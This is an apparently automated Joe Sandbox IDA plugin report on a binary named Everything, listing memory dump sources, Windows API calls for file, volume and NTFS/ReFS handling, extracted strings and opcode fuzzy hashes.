                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateFile
                                                                                                            • String ID: CreateFileW(): %d: Failed to open file %s
                                                                                                            • API String ID: 1722934493-646564424
                                                                                                            • Opcode ID: 84aa661f751eeb5b4d3626b26102719e36fc65a41999a8943f28810e51cf66b3
                                                                                                            • Instruction ID: 58bcf616c607d5e3629ecaf9433dc80d6d428743bab4c0a286355ffca2bfbc45
                                                                                                            • Opcode Fuzzy Hash: 84aa661f751eeb5b4d3626b26102719e36fc65a41999a8943f28810e51cf66b3
                                                                                                            • Instruction Fuzzy Hash: 0521A121A08A5981FB10DBA0F4543AA73A0FB897A4F500235EE6CC3B99EF3CD505AB40

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory$AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 689033430-0
                                                                                                            • Opcode ID: 4efd761817587ff5d3260f7f9c43d1024a1eddabcf7a12161da2c2472043ad14
                                                                                                            • Instruction ID: b8461cb724f575af07ef6f5e332e47746265c791e7fb12cb9cfc5f56f0be5628
                                                                                                            • Opcode Fuzzy Hash: 4efd761817587ff5d3260f7f9c43d1024a1eddabcf7a12161da2c2472043ad14
                                                                                                            • Instruction Fuzzy Hash: 51218012E0850A81FB305F65E8443B963B0EF89B74F484031DD6D863D9FF7CD591A641

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 999 7ff63d54b310-7ff63d54b31e 1000 7ff63d54b330-7ff63d54b339 999->1000 1001 7ff63d54b320-7ff63d54b32f SHTestTokenMembership 999->1001
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MembershipTestToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 1358604744-0
                                                                                                            • Opcode ID: eae98d34bb03379e9ed7029d014224fa7bded842c037536cdec59bfe3a02560c
                                                                                                            • Instruction ID: 777f111a2b25d8eb5070c1be71426b2400eff5113993a1ca7fb211e6dfb13fcd
                                                                                                            • Opcode Fuzzy Hash: eae98d34bb03379e9ed7029d014224fa7bded842c037536cdec59bfe3a02560c
                                                                                                            • Instruction Fuzzy Hash: 3AC01265F1260A83EF0D63BAA89236A00902B49320FC94838E81CC2390ED2CD9A66B00

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D545550: CreateFileW.KERNELBASE ref: 00007FF63D5455D2
                                                                                                              • Part of subcall function 00007FF63D545550: GetLastError.KERNEL32 ref: 00007FF63D5455EB
                                                                                                              • Part of subcall function 00007FF63D545550: GetLastError.KERNEL32 ref: 00007FF63D5455F6
                                                                                                              • Part of subcall function 00007FF63D5476D0: GetFileSize.KERNEL32(?,?,?,00007FF63D5E5E0E,?,?,00000001,00007FF63D47B7E8), ref: 00007FF63D5476DD
                                                                                                              • Part of subcall function 00007FF63D5476D0: GetLastError.KERNEL32(?,?,?,00007FF63D5E5E0E,?,?,00000001,00007FF63D47B7E8), ref: 00007FF63D5476EA
                                                                                                            • CloseHandle.KERNEL32(?,?,00000001,00007FF63D47B7E8), ref: 00007FF63D5E5EAD
                                                                                                              • Part of subcall function 00007FF63D53F750: GetProcessHeap.KERNEL32(?,?,?,00007FF63D4754C8), ref: 00007FF63D53F759
                                                                                                              • Part of subcall function 00007FF63D54C730: ReadFile.KERNEL32(?,?,00000000,00000001,00000000,00007FF63D5E5E51,?,?,00000001,00007FF63D47B7E8), ref: 00007FF63D54C77D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLast$CloseCreateHandleHeapProcessReadSize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2862973443-0
                                                                                                            • Opcode ID: c908d9a96aa98550657faa6f216da1dd1db21ca40a35f0483d688ed9d51af48c
                                                                                                            • Instruction ID: 5a4441f5e3cef87237f9cbf54909dbe014451044c8e0d6bfd16b4169d6161d36
                                                                                                            • Opcode Fuzzy Hash: c908d9a96aa98550657faa6f216da1dd1db21ca40a35f0483d688ed9d51af48c
                                                                                                            • Instruction Fuzzy Hash: 93217421A1D78A45EF64EFA5A5401B963919F89BF0F081335EE6E877DAFE2CE4009200

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00007FF63D61AF38,?,?,00000000,00007FF63D61D4A0,?,?,00000000,00007FF63D61D573,?,?,00000000,00007FF63D61A23D), ref: 00007FF63D619761
                                                                                                              • Part of subcall function 00007FF63D61AA00: GetModuleHandleA.KERNEL32(?,?,00000028,00007FF63D619755,?,?,00000000,00007FF63D61AF38,?,?,00000000,00007FF63D61D4A0,?,?,00000000,00007FF63D61D573), ref: 00007FF63D61AA0F
                                                                                                              • Part of subcall function 00007FF63D61AA00: GetProcAddress.KERNEL32(?,?,00000028,00007FF63D619755,?,?,00000000,00007FF63D61AF38,?,?,00000000,00007FF63D61D4A0,?,?,00000000,00007FF63D61D573), ref: 00007FF63D61AA24
                                                                                                              • Part of subcall function 00007FF63D61AA00: ExitProcess.KERNEL32 ref: 00007FF63D61AA35
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressAllocExitHandleHeapModuleProcProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2897468418-0
                                                                                                            • Opcode ID: 708c87c6aff96df7934445dc42ed7ea4468f22522d774f5efdf9c5970b67f917
                                                                                                            • Instruction ID: ebf2a8eb6ed1471cf4b2b733082aae6c3b1413a79ca3e87318bf3832f822be62
                                                                                                            • Opcode Fuzzy Hash: 708c87c6aff96df7934445dc42ed7ea4468f22522d774f5efdf9c5970b67f917
                                                                                                            • Instruction Fuzzy Hash: 3111C261E1D26F81FA156FE198402792290AF87BA0F081235ED3EC73C6FE2CE481B710

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1057 7ff63d61af10-7ff63d61af2c 1058 7ff63d61af30-7ff63d61af33 call 7ff63d619700 1057->1058 1060 7ff63d61af38-7ff63d61af3e 1058->1060 1061 7ff63d61af6b-7ff63d61af7f 1060->1061 1062 7ff63d61af40-7ff63d61af46 1060->1062 1062->1061 1063 7ff63d61af48-7ff63d61af66 Sleep 1062->1063 1063->1058 1064 7ff63d61af68 1063->1064 1064->1061
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D619700: HeapAlloc.KERNEL32(?,?,00000000,00007FF63D61AF38,?,?,00000000,00007FF63D61D4A0,?,?,00000000,00007FF63D61D573,?,?,00000000,00007FF63D61A23D), ref: 00007FF63D619761
                                                                                                            • Sleep.KERNEL32(?,?,00000000,00007FF63D61D4A0,?,?,00000000,00007FF63D61D573,?,?,00000000,00007FF63D61A23D,?,00000000,00000000,00007FF63D61A308), ref: 00007FF63D61AF4A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeapSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 2660413188-0
                                                                                                            • Opcode ID: 40f0287c1d2e351c3d6dafe122cdd267842c2f4bf9d12561c2d97e67898f8213
                                                                                                            • Instruction ID: acf8248181cf52e848d2a8689eb8f8cbf652f6e4175a30a97690b4f1b177b7bd
                                                                                                            • Opcode Fuzzy Hash: 40f0287c1d2e351c3d6dafe122cdd267842c2f4bf9d12561c2d97e67898f8213
                                                                                                            • Instruction Fuzzy Hash: 82F0C832E19B9D86E6409F51A54003D7350FB85B90F140135EA7E83755EF3CE892E700
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524149
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceCounter.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524158
                                                                                                            • SetErrorMode.KERNEL32(?,?,?,?,?,00007FF63D49622D,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D5428A3
                                                                                                            • SetErrorMode.KERNEL32(?,?,?,?,?,00007FF63D49622D,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D5428B2
                                                                                                            • GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,?,?,?,00007FF63D49622D,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D542950
                                                                                                            • FindFirstVolumeW.KERNEL32(?,?,?,?,?,00007FF63D49622D,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D542A9D
                                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?,?,00007FF63D49622D,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D542B49
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00007FF63D49622D,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D542B56
                                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?,?,00007FF63D49622D,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D542BA7
                                                                                                            • FindNextVolumeW.KERNEL32(?,?,?,?,?,00007FF63D49622D,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D542E8B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Volume$ErrorName$FindModeNamesPathPerformanceQuery$CounterFirstFrequencyLastMountNextPoint
                                                                                                            • String ID: %S GetVolumeNameForVolumeMountPoint %S %d$%S GetVolumeNameForVolumeMountPoint FAILED %d$%S is ntfs$.$:$:$:$:$:$:$GetVolumeNameForVolumeMountPoint %S$GetVolumeNameForVolumeMountPoint ok %s %s$GetVolumePathNamesForVolumeName %d$GetVolumePathNamesForVolumeName %s$GetVolumePathNamesForVolumeName2 %d$QueryDosDevice %d %S %S$VEH %d$\$\$\$\$\$\$\??\$\Device\HarddiskVolume$add volume: %s | %s | %s$config volume: %s | %s | %s | %d$ntfs volume create list %f seconds$volume %s: drive type %d$volume: %s | %s | %s found %d
                                                                                                            • API String ID: 3547686011-2923626951
                                                                                                            • Opcode ID: cde69163b5470e8f8bd99dd86a54a952a64c5a4669a06d5132019c5abcb7a803
                                                                                                            • Instruction ID: 81de49bd3cc3c082c130305fc9f65ae100dcc3199daa7e076f27db03a7d2cfe6
                                                                                                            • Opcode Fuzzy Hash: cde69163b5470e8f8bd99dd86a54a952a64c5a4669a06d5132019c5abcb7a803
                                                                                                            • Instruction Fuzzy Hash: DE62B122E0C69A91EB60DB91E4502FE6770FB95794F401036DE8D837A9EF3CD158EB41
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$ControlDeviceErrorFileLast$HeapOpen$AllocCreateProcess
                                                                                                            • String ID: NO file from frn %d$NTFS parent frn %016I64x %t$REFS parent frn %016I64x%016I64x %t$frn:$frn: invalid volume handle$got refs file handle from id$no refs FSCTL_READ_FILE_USN_DATA
                                                                                                            • API String ID: 3289091923-2003309268
                                                                                                            • Opcode ID: ca60ff2aaa5c91e18eb38729863f293e3be595fc1853fa4cd912b29ccab39dfa
                                                                                                            • Instruction ID: f45403b56f9f0ec13f6b915d35f8e26f8c384144f3c4b57b74954d89bd062875
                                                                                                            • Opcode Fuzzy Hash: ca60ff2aaa5c91e18eb38729863f293e3be595fc1853fa4cd912b29ccab39dfa
                                                                                                            • Instruction Fuzzy Hash: F632CD72A08B8A86E764CF51E4807AE77A4FB88754F414135DBAD87786EF3CD464EB00
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$File$AllocPointerReadVirtual
                                                                                                            • String ID: NTFS $bad NTFS signature: %t$bad sector size %u$bytes_per_cluster %d$bytes_per_cluster %u$bytes_per_file_record %u$failed to alloc sector buf$failed to read NTFS boot sector: %u$failed to set file pointer to boot sector %u$invalid bytes_per_cluster %u$invalid bytes_per_file_record %u$invalid bytes_per_sector %u$mft_lcn %I64u$sectors_per_cluster %d$serial_number %I64u$unable to read all of NTFS boot sector: %u
                                                                                                            • API String ID: 3306963534-3773426258
                                                                                                            • Opcode ID: 83f98285d95a08c6bcedf1c9a80f618aaa79a11f8a705edbeadedebb7da22fc4
                                                                                                            • Instruction ID: 04ea37c719cd10e0482ca9797c46bc48755e420725eaaeaa15c0a4e3d2df5e92
                                                                                                            • Opcode Fuzzy Hash: 83f98285d95a08c6bcedf1c9a80f618aaa79a11f8a705edbeadedebb7da22fc4
                                                                                                            • Instruction Fuzzy Hash: 3E61AD21E085AB96FB009BA1E94017973A2BB85764F404036EE5DC3BA9FF3CE559F340
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$Device$CloseHandleNotificationRegister$ControlCreateFile
                                                                                                            • String ID: 8$RegisterDeviceNotification %s failed! %d$RegisterDeviceNotification volume_handle %p$access denied %s$ntfs monitor %p %p$ntfs service monitor %p %p %d$refs monitor %p %p$refs service monitor %p %p %d$start all monitors (ntfs: %d refs: %d)$start monitor thread: failed to open volume: %s: %d:
                                                                                                            • API String ID: 3820180192-4260257721
                                                                                                            • Opcode ID: 91807dd3ab9d901178497b16a781845a7f2484ea14fe5e9e0d234902db1010f1
                                                                                                            • Instruction ID: b7c462ee0e6df05b69a946b304b685662b5756a7f26efdee1e98056440b431bc
                                                                                                            • Opcode Fuzzy Hash: 91807dd3ab9d901178497b16a781845a7f2484ea14fe5e9e0d234902db1010f1
                                                                                                            • Instruction Fuzzy Hash: 9DD19372A08B8A85E7509FA5E4403AA73B0FB45B98F044136EF5D87799EF3CD498E740
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D619F30: FlsGetValue.KERNEL32(?,?,?,00007FF63D61DDFE,?,?,?,?,00000000,00000000,000000FF,00000000,A28000000001A38E,00007FF63D61B429), ref: 00007FF63D619F4A
                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,00000000,00000000,000000FF,00000000,A28000000001A38E,00007FF63D61B429,?,?,00000000,00000000,00000001,00007FF63D61B57C), ref: 00007FF63D61DE22
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,00000000,00000000,000000FF,00000000,A28000000001A38E,00007FF63D61B429,?,?,00000000,00000000,00000001,00007FF63D61B57C), ref: 00007FF63D61DE3E
                                                                                                              • Part of subcall function 00007FF63D619E60: FlsGetValue.KERNEL32(00000000,?,00000000,00007FF63D61DE55,?,?,?,?,00000000,00000000,000000FF,00000000,A28000000001A38E,00007FF63D61B429), ref: 00007FF63D619E80
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,00000000,00000000,000000FF,00000000,A28000000001A38E,00007FF63D61B429,?,?,00000000,00000000,00000001,00007FF63D61B57C), ref: 00007FF63D61DE66
                                                                                                              • Part of subcall function 00007FF63D619E60: GetModuleHandleA.KERNEL32(00000000,?,00000000,00007FF63D61DE55,?,?,?,?,00000000,00000000,000000FF,00000000,A28000000001A38E,00007FF63D61B429), ref: 00007FF63D619E9B
                                                                                                              • Part of subcall function 00007FF63D619E60: GetModuleHandleA.KERNEL32 ref: 00007FF63D619EC2
                                                                                                              • Part of subcall function 00007FF63D619E60: GetProcAddress.KERNEL32 ref: 00007FF63D619F08
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,00000000,00000000,000000FF,00000000,A28000000001A38E,00007FF63D61B429,?,?,00000000,00000000,00000001,00007FF63D61B57C), ref: 00007FF63D61DE85
                                                                                                            • GetProcAddress.KERNEL32 ref: 00007FF63D61DED3
                                                                                                            • GetProcAddress.KERNEL32 ref: 00007FF63D61DEF7
                                                                                                              • Part of subcall function 00007FF63D61B0B0: RtlCaptureContext.KERNEL32 ref: 00007FF63D61B0C1
